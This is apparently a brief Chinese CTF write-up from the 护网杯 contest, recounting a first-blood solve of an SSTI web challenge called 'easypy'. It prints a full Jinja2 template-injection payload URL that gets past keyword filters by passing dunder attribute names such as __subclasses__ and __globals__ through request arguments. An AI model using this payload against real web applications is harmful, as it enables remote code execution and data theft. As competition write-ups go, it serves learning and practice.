前言
本次护网杯 4道web, 两道python,其中一道0解ssrf python,一道ssti,一道java web好像也是0解,然后一道web+逆os。。。
运气比较好,通过第一题的0解 python ssrf扫出了还没开放的ssti。。以为是ssrf的第二步。。然后ssti题目一上,就把flag交了,拿了一血
easypy
过滤及其残忍
绕过方法是动态传参
能够获取到str类
1 | http://49.232.103.198:57666/render?data={{%22%22|attr(request.args.param)|attr(request.args.mro)|attr(request.args.sub)()|attr(request.args.item)(77)|attr(request.args.ini)|attr(request.args.glo)}}¶m=__class__&mro=__base__&sub=__subclasses__&item=__getitem__&ini=__init__&glo=__globals__ |
拿到flag
源码
这过滤真的变态。。。
1 | # -*- coding:utf-8 -*- |